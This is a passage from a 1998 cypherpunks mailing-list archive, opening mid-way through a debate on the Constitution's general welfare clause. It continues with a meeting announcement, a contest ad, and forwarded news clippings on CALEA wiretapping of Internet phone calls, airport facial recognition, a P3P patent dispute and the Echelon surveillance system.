clause is almost meaningless.  Like the DOI it specifies intent, but not a
specific delegation of power.  The delegation of powers, the seperation 
of those powers and reservation of individual human rights are what is 
the motive forces behind the constitution.

If the general welfare clause were a law it would have to be found
invalid for vagueness.

> > > Had the supreme court bothered to read the founder's writings on this
> > > they would have found it in a week or two.  That's assuming their
> > > conclusion was not already decided.
> 
> Found what? Whose conclusions, the founding fathers or the sitting supremes?

Read it again, Jim.  "bothered to read the *founder's writings* on this"

> 
> > > The constitution is a document that enumerates the powers of the federal
> > > government.  It is very specific.
> 
> And prohibits the enumeration of individual liberties by the same
> government. Rather handy little situation that, since it completely blows
> holes in any move to derive totalitarian control (which by the way is not
> democratic).

You seem to be confusing the concepts of "powers" and "rights".  People
have rights, institutions have powers.  The constitution enumerates the
specific *powers* of the federal government.  However agenda motivated
SC judges in 1937 seemed to ignore the 9th and 10th amendment to the 
constitution and extend the meaning of the "general welfare" clause to an 
extra-constitutional extent.  They overrode the limited powers of the
federal government.

 > 
>   As Madison stated, if the general
> > > welfare clause meant what the socialist engineers wished it meant, there
> > > would have been no need to enumerate the specific powers of the federal
> > > government.
> 
> Well to be accurate there was no enumeration of the specific powers in the
> original Constitution, it's why Jefferson (who was in France at the time),
> Madison, and others fought and supported the Bill of Rights. Because of the
> 9th and 10th such moves are inherently doomed to failure.

Excuse me.  There was no enumeration of the powers of the federal
government in the original constitution?  How exactly do you create
a constitution without a mention of the various powers that branches
of government are going to have?

Not to mention that the arguments with respect to a bill of rights was 
not that the original constitution bestowed unlimited powers, but
that since the constitution only bestowed limited powers that there
was no need for a bill of rights.  Jefferson was concerned that with
no BOR people would not have a guidebook to know when the state
was overstepping its mandated powers.

> 
>   In fact, it would have been as if the founding fathers had
> > > said: 
> > > 
> > > "The federal government has unlimited power to do whatever it
> > > feels necessary."
> > > 
> > > "The powers of the federal government are as follows"
> > > 
> > > (1) 
> > > (2)
> > > (3) etc
> > > 
> > > Which would be ridiculous on its face.
> 
> This entire section is ridiculous. To say on one hand the powers are
> unlimited and then to proceed to list them weakens the argument, this was
> also the reason for the 10th. It prevents such extrapolations as this.
>

I'm sorry it was so unclear to you.  Let me reiterate.  The 1937 Supreme
Court stated that the general welfare clause was a grant of unlimited 
federal powers to impose "general welfare".  You let me know what
"general welfare" would limit them to.  I was pointing out, as Madison
stated, that to read the constitution this way would be to read it
as if the constitution had just granted the federal government unlimited 
powers and then proceeded to enumerate the specific powers.  As I
pointed out and as appears above "this would be ridiculous on its
face".  You simply restated that and then proceeded to argue with
me.

> > > The reality of the situation is that Roosevelt kept trying to stack the
> > > Supreme Court.
> 
> Wow, I didn't realize Roosevelt was even alive to participate in the
> original Constitutional debates.
>

Since this was a dicussion of the nails in the coffin of the Republic
and since that covers about 150 years it is necessary to cover that
time span.
 
> I'm going to stop here since we are obviously off on one of your pet peeves
> that isn't related to the discussion at hand. To jump 150 years in one fell
> swoop is pretty extraordinary. The reality is, as Jefferson himself said,
> that the laws of one generation aren't the laws of another.

Yes, the destruction of the constitution is a pet peeve of mine as it is
for many people on the list.   The reason I even brought it up is that 
you seemed to be misinformed on the extent of the powers of the federal 
government granted by the constitution.  The whole "social contract" 
theory is bunk.

The reality is that the laws of the previous generations certainly are the
laws of succeeding generations.  The entire body of English Common Law is
based on this concept.  The constitution is amendable, that is what
Jefferson meant.  By all means amend it if you are able, but don't pretend
under color of law that the constitution means something other than what
it says.

Here is the point of this whole dicussion:

(1) The constitution chains down the federal government in a prison of
specific limited powers.

(2) The general welfare clause is not an escape clause from that prison.

(3) The general welfare clause is not a justification for transfer 
payments or other systems of theft.

(4)The dismantling of the republic began with the civil war, was
accelerated by the formation of the Federal Reserve and new taxation
systems and eventually finalized by Roosevelt's stacking of the supreme court
when Social (in)Security was challenged in 1937.  The subsequent reading by
the Supreme that the "general welfare" clause was a delegation of 
unlimited federal powers essentially destroyed the notion of limited
federal power and began the vast bureaucratic machine that we know
and love today.

jim

"The two enemies of the people are criminals and government, so let us tie
the second down with the chains of the constitution so the second will not
become the legalized version of the first." -- Thos. Jefferson

". . . we are fast approaching the stage
   of the ultimate inversion: the stage
   where the government is free to do
   anything it pleases, while the citizens
   may act only by permission; which is
   the stage of the darkest periods of
   human history, the stage of rule by
   brute force."
   - Ayn Rand , The Nature of Government

"In questions of power, then, let no more be said of confidence in man, 
but bind him down from mischief by the chains of the Constitution."
  --Thomas Jefferson

"A wise and frugal government, which shall restrain men from injuring one 
another, shall leave them otherwise free to regulate their own pursuits 
of industry and improvement, and shall not take from the mouth of labor
the bread it has earned."
  --Thomas Jefferson 

"No man can take another's property from him without his consent. This 
is the law of nature; and a violation of it is the same thing, whether it
be done by one man who is called a king, or by five hundred of another
denomination..."
  --Samuel Adams 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 13 Nov 1998 03:59:41 +0800
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: SATURDAY Bay Area Cypherpunks Meeting - Stanford University
Message-ID: <3.0.5.32.19981112110802.00bb2470@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



The November Cypherpunks Meeting will be Saturday 11/14 from 1-5pm
at Stanford, at the tables outside Tresidder Union, near the bookstore.
The tables are on the west side, which is the inside of the U-shape.  
Coffee and food are available in the building. 
If the weather is uncooperative, we will also be inside the building.

Lucky Green will be talking about his latest work.

Bagels and Bagel Parephrenalia will be provided.

Directions to Stanford Tresidder Hall
	Stanford is between El Camino Real and Junipero Serra Blvd,
	which are between 101 and 280.  The Tresidder Parking Lot
	is on Mayfield Ave, off Campus Drive East.

http://www.stanford.edu/home/map/search_map.html?keyword=&ACADEMIC=Tresidder+Union
http://www.stanford.edu/home/map/stanford_zoom_map.html?234,312

The upside-down map of Stanford&Vicinity is at
http://www.stanford.edu/home/visitors/vicinity.html

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: palmdeveloper@palmdevcon.com
Date: Fri, 13 Nov 1998 04:39:22 +0800
To: cypherpunks@toad.com
Subject: Enter Symbol's Hacker Contest at the Palm Computing Platform Developer Conference!!
Message-ID: <199811122006.MAA11024@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Symbol announces the first annual Symbol SPT 100 Developer Contest!

You could win a Toshiba Tecra 780 DVD 266 MHz Pentium II Notebook by developing the Best SPT 100 
Application.  Other cool prizes will also be awarded.  Everyone who participates will receive a t-shirt.  

You must be a registered attendee of the Palm Computing Platform Developer Content to participate.  
Winners will be announced at the Conference,  December 1-4.  For more details on the contest, and to 
register for the conference, point your browser to http://www.palmdevcon.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 13 Nov 1998 02:27:37 +0800
To: cypherpunks@cyberpass.net
Subject: RE: DCSB: Mary Ellen Zurko; Jonah, IBM, Open Source, and Digital Commerce
Message-ID: <2C396693FBDED111AEF60000F84104A721C069@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Mary Ellen Zurko is Security Architect at Iris, the folks who brought you
>> Lotus Notes.

>I suggest she be hung by her toes until she repents for that
>abomination.

IIRC, back in the www-security mailing list days, she wasn't at Iris at all
-- so she wasn't there when the original architecture was laid in place.

MLF "former Notes admin"
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:27:36 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.28: Wiretapping Internet Phone Lines
Message-ID: <199811130027.QAA17242@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Ama-gi ISPI" <Offshore@email.msn.com>
Subject: IP: ISPI Clips 6.28: Wiretapping Internet Phone Lines
Date: Wed, 11 Nov 1998 00:13:40 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.28: Wiretapping Internet Phone Lines
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Wednesday November 11, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED News, November 10, 1998
http://www.wired.com

Wiretapping Internet Phone Lines
http://www.wired.com/news/news/politics/story/16146.html

by
Declan McCullagh

A federal wiretapping law designed to let police snoop on telephone calls
could have profound implications for companies that offer Internet phone
service. Then again, it might not affect them at all.

The 1994 Digital Telephony law, which requires telecommunications companies
to wire surveillance technology into their networks, could force Internet
telephony firms to configure their systems to be easily wiretapped by law
enforcement agencies. A Federal Communications Commission official, who
declined to be identified, said the FCC is trying to decide how the law
should apply to IP telephony and what types of Internet phone calls should
be covered.

In a report
http://www.fcc.gov/Bureaus/Common_Carrier/Notices/1998/fcc98282.txt ]
released Thursday, the FCC said the law applies to "packet-switching
technology" that is "used to provide telecommunications services."

"It's a major issue that has to be sorted out," said James Dempsey, senior
staff counsel for the Center for Democracy and Technology. "What side of
the line does Internet telephony fall on? [Companies] should definitely
wake up and pay attention."

The wiretapping law, also known as the Communications Assistance for Law
Enforcement Act, or CALEA, gave the FCC the authority to set standards and
timetables. The agency said in September that companies must comply with
CALEA by 30 June 2000.

The FCC has tentatively ruled that IP telephony using computers is an
"information service" and, therefore, not covered by CALEA.

But the agency has also said that phone-to-phone IP telephony falls into
the category of
[ http://www.fcc.gov/Bureaus/Common_Carrier/Reports/fcc98067.txt ]telecommu
nications services. That category includes firms like IDT and Qwest, which
allow long-distance customers to phone a local gateway and forward those
calls over the Internet to a gateway at the other end.

"I think, fundamentally, this is one of the sleeper issues that is going to
be affecting the Internet telephony industry into the year 2000 and
beyond," said Jeff Pulver, co-founder of the VON Coalition
http://www.von.org/ ].

"We all need to be aware of what the legal issues are," Pulver said. "I'm
all for what I call 'intelligent regulation.' If we need to comply, then
damn it, we should comply. Ignorance is no excuse."

"Internet telephony will eventually be included in CALEA," said Alyson
Ziegler, director of legislative affairs for the United States Telephone
Association [ http://www.usta.org/ ] "It's a matter of time."

CALEA's backers say the law was designed to allow authorities to monitor
conversations surreptitiously on digital phone lines just as they are now
able to tap into analog phone lines. But privacy advocates oppose the
measure, arguing that it expands the government's surveillance power.

"This is something we've been warning about for years, that the convergence
between these technologies will make the distinctions originally
contemplated in CALEA ultimately moot," said David Banisar, a lawyer at the
Electronic Privacy Information Center. "CALEA will be applied to the Net
regardless of what the intent of the law actually was."

Even before CALEA became law, indications surfaced that law enforcement
would like it to include the Internet. When asked about that possibility
during a hearing in August 1994, FBI Director Louis Freeh replied, "It's
certainly a possibility -- if, God forbid, someone blows up the World Trade
Tower using a PC to PC network."

Making an already prickly issue even thornier is the fact that some IP
telephony companies use encryption to scramble conversations. NetSpeak, for
example, uses RSA encryption [ http://www.netspeak.com/ ].

If two IP phone customers are using public key cryptography to chat in a
way that even the IP telephony company can't decode, law enforcement agents
are out of luck -- one reason why the FBI has lobbied to ban the
manufacture and distribution of encryption devices without key escrow
backdoors.

Not all companies are complaining about CALEA.

Aplio [ http://www.aplio.com/ ] CEO Olivier Zitoun believes his company's
products fall into the FCC's definition of computer-to-computer IP
telephony. Aplio sells boxes that can be plugged into normal touch-tone
phones and used to call an Internet provider, which routes calls over the
Net.

"We are very different than other phone-to-phone devices or solutions,"
Zitoun said. "In a way, the discussion of IP-telephony regulation doesn't
really apply to us."

Copyright (c) 1994-98 Wired Digital Inc.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.












****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:03:58 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Scanner picks out criminals
Message-ID: <199811130027.QAA17253@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Scanner picks out criminals
Date: Wed, 11 Nov 1998 19:33:38 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS
11/11/98

Some people will argue -- after reading the following article -- that
systems designed to electronically "recognize" a face in a crowd will never
be reliable. They will contend: such systems will never be 100% accurate.
Unfortunately, "accuracy" is a very subjective term, and, if the
administrators of these systems,(i.e. the ones who can forcibly apprehend
the "identified" subjects), deem their system accurate, then the burden of
"proving innocence" suddenly becomes that of the accused. At that moment, it
no longer matters whether the system was or was not "accurate" -- you're
under investigation.

-----Original Message-----
From: Y2kplanner@aol.com [mailto:Y2kplanner@aol.com]
Sent: Wednesday, November 11, 1998 3:09 PM
--------------------------

>From the 11/1/98 Sunday London Times www.sunday-times.co.uk
- you must register at the site and then search by date.

--------------------------

Scanner picks out criminals

TRIALS of a computer system that can recognise criminals and terrorists
begin this week.

 The equipment is to be hidden in an unnamed British airport to see if it
can pick out criminals even if they have grown a beard or are wearing
glasses to hide their identity.

 The system is the first that can produce three-dimensional scans of a face
instantly and then search a database of suspects for a match.

 It has been devised by Cambridge Neurodynamics, which already produces
software that analyses fingerprints and  then searches a database for a
match. Police in South Yorkshire use its software.

 Cambridge Neurodynamics says its facial-recognition project will enable
security officers at Britain's ports and airports to concentrate on people
the computer indicates bear a good likeness to known criminals and
terrorists. The alternative is to rely on trained officers to remember faces
of people on the wanted list.

 George Harpur, a Cambridge Neurodynamics systems consultant working on the
project, says a computer will be  able to store thousands of pictures of
wanted people.

 "It should be like having an extra security officer with the most
incredible memory," he says. "We're not intending to replace immigration
officers but rather give them a tool that can point them towards the people
they are mostly likely to be interested in."

 The system works by taking pictures of a person as he approaches a video
camera. The resulting handful of frames give several two-dimensional
pictures. To add depth to the face, two low-power lasers scan its contours
from either side.

 A computer combines the contour information with the images it has of the
front of the face. It can then build a virtual model of each traveller's
face, which is checked against the database of wanted people.

 "The airport involved in the trial is particularly interested in the
possibility of using the technology to track people who bring in groups of
illegal immigrants," says Harpur. "The computer could be alerted to their
presence and take a 3D scan of their faces when they pass through passport
control. Then the system could track them every time they enter the country
and build up evidence against them."

 The system can also be used to store 3D Photofits of terrorists. Again, it
is most likely to be used to take a 3D scan of suspects when they pass
through its lasers for the first time. The scan would be stored and the
computer would log the suspect's movements.

 Cambridge Neurodynamics says it can build 3D Photofits from ordinary
photographs or video stills but says the system is far more accurate if the
suspects are photographed by the system.

 The team believes 3D scans are necessary because 2D technology can be
fooled. It generally measures the distance between facial features but these
can change with the angle of the head to the camera.

 The new computer system can be fooled only if a suspect has surgery to
change the shape of his face. Criminals who realise they are about to be
scanned and look away or pull a funny face will not trick the computer. It
is geared towards seeking similarities around the eyes, which humans use to
pick out one another and that do not change with expression and age as much
as the rest of the face.

 The airport trial will last six weeks. If the equipment works, the company
will load the software on a powerful workstation computer, rather than a PC,
so searches can be speeded up.

 Cambridge Neurodynamics also plans to approach banks to set up a trial in
which the computer would allow only designated staff into security-sensitive
areas. Eventually, the technology could be used to verify a customer's
identity before he is given money.

++++++++++++++
Nancy Martin
y2kplanner@aol.com

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:11:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.33: Patent May Threaten E-Privacy
Message-ID: <199811130027.QAA17264@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Ama-gi ISPI" <Offshore@email.msn.com>
Subject: IP: ISPI Clips 6.33: Patent May Threaten E-Privacy
Date: Thu, 12 Nov 1998 00:08:59 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.33: Patent May Threaten E-Privacy
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Thursday November 12, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED news, November 11, 1998
http://www.wired.com

Patent May Threaten E-Privacy
http://www.wired.com/news/print_version/technology/story/16180.html?wnpg=al
l

by
Chris Oakes, chriso@wired.com

The future of a key Web standard that would give consumers control over
their online privacy hangs in the balance after news emerged that a
entrepreneur will likely be awarded a set of patents on the technology.

The technology, the Platform for Privacy Preferences (P3P) is critical to
the Internet industry's current effort to show the US government that it
can look after the interests of consumers. The specification was to be used
in the next versions of America Online, Netscape Communicator, Microsoft
Internet Explorer, and many other software products and Web sites.

"If somebody owns [P3P], they can prevent other people from using it," said
Deirdre Mulligan, staff counsel for the Center for Democracy and
Technology.

"We put all this work into something that works, then who knows if it's
going to get out there."

At the core of the issue is one man, Drummond Reed, CEO of Intermind. Reed
said that the US Patent and Trademark Office is expected to issue his
company a patent on the idea of P3P.

Intermind [ http://www.intermind.com/ ] was, until July, a member of the
standards group that is collectively developing P3P. He resigned when word
spread among the members that he would likely be awarded patents on
technologies affecting a broad category of "automated information exchange
using software objects."

That sounds very much like P3P. The standard is meant to provide a way for
consumers and the Web sites they visit to automatically negotiate what can
and can't be done with any personal data collected by a site. The
technology would reside within both Web browsers and Web sites.

On a document [ http://www.intermind.com/W3CMembers/licensing_summary.htm ]
on the Intermind Web site, Reed said that his company would request a
minimum royalty of US$50,000 per year to a maximum of $2.5 million from
companies implementing P3P, plus 1 percent of all revenues directly
associated with the technology.

Both Microsoft and Netscape declined to comment for this story.

"P3P is the nuclear weapon of privacy," said Matt Markus, chief architect
and cofounder of Privacy Bank, a company developing an automatic
registration service that safeguards a user's privacy.

Privacy Bank shifted its company strategy to lessen its dependence on P3P.
Markus said he expects the patent will be revoked.

"[The patent] is going to hurt young companies who want to help develop the
solution," Markus said. "It is the snake in the grass, a complete surprise,
it would really shoot the morale at my company if I was depending on
[P3P]," he said.

Reed acknowledges that some working group members want "to just crucify
us" -- but he says his company has been up-front from the beginning that it
has held intellectual property rights pertaining to P3P and other Web
standards relating to "push" technology.

"We have been in communication with the [Consortium] and working group
members pretty much from the start," Reed said. "We've been in constant
communication with W3C management and key member companies involved in this
area."

P3P is not yet a final standard, but progress in the World Wide Web
Consortium working group has slowed since news of the pending patent seeped
out in July, according to Steve Lucas, chief information officer for an
Excite division that has been developing P3P-based software.

"There are ways of working around P3P," he said. These include custom-made
variations on the protocol that circumvent elements covered by the patent,
and shifting work toward an older protocol known as the Open Profiling
Standard.

Lucas said companies are going ahead with work on P3P. But they are
simultaneously making contingency plans should the patent have a stifling
effect.
If Drummond's pending patents stand, the thousands of companies doing
business on the Internet could face new laws designed to protect the
interests of consumers. The Federal Trade Commission, which would recommend
such laws, has given the industry until the end of this year to demonstrate
that it can "self-regulate," and P3P is key to that plan.

"Some combination of the [P3P and Open Profiling Standard] technologies may
be a more transparent way to protect consumers privacy," David Medine, an
associate director at the Commission told Wired News earlier this year.

Daniel Weitzner, who oversees the development of P3P at the World Wide Web
Consortium, insists P3P development is still on track, but echoed the same
concerns.

"If anyone succeeds in extracting big licensing fees for P3P
implementations, that would hamper the availability of the technology," he
conceded. "Really the question turns on what happens with that patent."

But working on ways to perform privacy negotiations without a standard
presents a big obstacle to the industry.

"Not having a standard everybody can agree on does create some
interoperability problems," Lucas said.

"This is a collaborative process about trying to develop socially useful
protocols and now we have somebody walking away and saying they own it,"
added working group member Mulligan of the Center for Democracy and
Technology.

Weitzner said the issue now is not who said what when but what to do once
the patents are issued. He declined to comment on the possibility of
mistakes made in the past by W3C management.

"The issue is whether or not the patent is valid, not who told what to whom
or when," Weitzner said. "The concern I hear is about the attack on
openness, not the timing."

That issue -- how a patent might affect a Web standard -- is a new one for
the W3C.

"Our members have not had to face this issue because no one has had to try
to stand in the way of openness in a way that Intermind appears to be
doing...." The question now is "whether or not they're going to be able to
hold up a standard that has a potentially significant social impact."

James Glave contributed to this report.


Copyright (c) 1994-98 Wired Digital Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.














****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:00:15 +0800
To: cypherpunks@cyberpass.net
Subject: IP: World's biggest hard drive
Message-ID: <199811130028.QAA17275@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: World's biggest hard drive
Date: Wed, 11 Nov 1998 23:15:59 -0600
To: believer@telepath.com

   WORLD'S BIGGEST DISK DRIVE

     To mark the centenary of magnetic recording, IBM today unveiled the
largest (25gb) hard drive yet produced for PCs. It's shipping limited
numbers to PC makers for use in machines that will be ready for Christmas.
IBM introduced the first disk drive, back in 1956. It had a capacity of 5mb
and was the size of two large refrigerators. The new 25gb drive comes on
the 100th anniversary of the Telegraphone, a primitive answering machine.
See http://www.ibm.com/News/1998/11/11.phtml  

  From: Alan Farrelly, News Interactive. Australia


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Nov 1998 09:57:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Push for hearings on Echelon - Global spy system needs scrutiny, says rights group
Message-ID: <199811130028.QAA17291@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Push for hearings on Echelon - Global spy system needs scrutiny, says rights group
Date: Thu, 12 Nov 1998 09:29:44 -0600
To: believer@telepath.com

Source:  WorldNetDaily
http://www.WorldNetDaily.com/bluesky_exnews/19981112_xex_push_hearing.shtml

Push for hearings on Echelon 
Global spy system needs scrutiny, says rights group 
 
By Stephan Archer 
Copyright 1998 WorldNetDaily.com 
 
In an effort to create some accountability between the
country's citizens and the National Security Agency's
top-secret global surveillance system known as
Echelon, the Free Congress Foundation is urging that
congressional hearings be held concerning the NSA's
use of the system. 

Originally, Echelon was designed to spy on the
Communist Bloc during the Cold War. However, since
the end of the Cold War, the NSA has used it for
other questionable purposes that include spying on the
citizens of U.S. allies as well as the citizens of other
countries, commercial spying, and even domestic
spying. 

In essence, Echelon works through a series of
high-tech spy facilities located primarily in five
countries: the United States, Canada, England, New
Zealand, and Australia. These countries, which are
sworn to secrecy about the project in a secret
agreement known as UKUSA, all actively take part in
this encroachment of privacy into the lives of the
people of the world by collecting virtually all fax
transmissions, e-mails, and phone calls. Not even
cellular phone calls escape the grasp of the Echelon
system. 

"Obviously, we need to have these capabilities," said
Wayne Madsen, who worked in the National
COMSEC Assessment Center at the NSA's Fort
Meade, Maryland, facility back in the 1980s and is
currently a senior fellow at the Electronic Privacy
Information Center. 

As an example of our country's need for the system,
Madsen said, "No one can argue about using the
system to counter terrorism. Where people will have a
problem is where Echelon is used for political and
business interests." 

The Echelon system gets most of its data by collecting
all transmissions handled by the Intelsat and Inmarsat
satellites, which are responsible for much of the
electronic communication that takes place between
countries. Earth-bound communication is sucked up
and absorbed by other spy satellites that the NSA has
launched into space. 

"It's a huge vacuum cleaner," said Madsen. 

Once these spy facilities collect the phone calls,
e-mails, and faxes, of virtually everyone on earth, the
Echelon system sorts them through a kind of filter
system known as the Echelon dictionary. This
dictionary looks for "flag" words in all of the
transmitted communication. While it lets a majority of
all collected material pass through its filter, it tags those
that may pose a threat and tracks all subsequent
communication coming from the source of the original
"flagged" message. 

Concerning Echelon's inherent intrusion on people's
privacy, Patrick Poole, the deputy director for the
Center of Technology Policy at the Free Congress
Foundation, said, "While we understand the need for
the intelligence power embodied by Echelon, the
indiscriminate use of Echelon presents major threats to
liberty not only to U.S. citizens but to citizens around
the world." 

And this threat is real. The foundation's report states
that U.S. leaders have, in fact, already abused this
awesome technology. For example, the report states
the following: "In September 1993, President Clinton
asked the CIA to spy on Japanese auto manufacturers
that were designing zero-emission cars and to forward
that information to the Big Three U.S. car
manufacturers: Ford, General Motors and Chrysler." 

"You can assume that all major U.S. corporations are
fed items of interest (via Echelon) from time to time to
give them a leg up on international competitors," said
Madsen. 

Although this may be seen as a strategic corporate
weapon for American businesses, in reality, it's an
example of technology that can get out of hand. For
example, former Canadian spy Mike Frost stated in his
book, "Spyworld," that in 1981, there was an
"accidental" cell phone intercept of the American
ambassador to Canada that resulted in the U.S. getting
outbid by the Canadians in a grain deal with China.
The deal brought in $2.5 billion for the Canadian
Wheat Board. 

With this kind of abuse of Echelon's power, the
question as to whether or not the U.S. government has
been using this power for political purposes can be
easily raised. This question is seemingly answered in
the foundation's report. 

"The discovery of domestic surveillance targeted at
American civilians for reasons of 'unpopular' political
affiliation -- or for no probable cause at all -- in
violation of the First, Fourth and Fifth Amendments of
the Constitution is regularly impeded by very elaborate
and complex legal arguments and privilege claims by
the intelligence agencies and the U.S. government," the
report says. 

When asked if the system has been used by the U.S.
government to spy on its citizens, Madsen told
WorldNetDaily that he was sure it has been. 

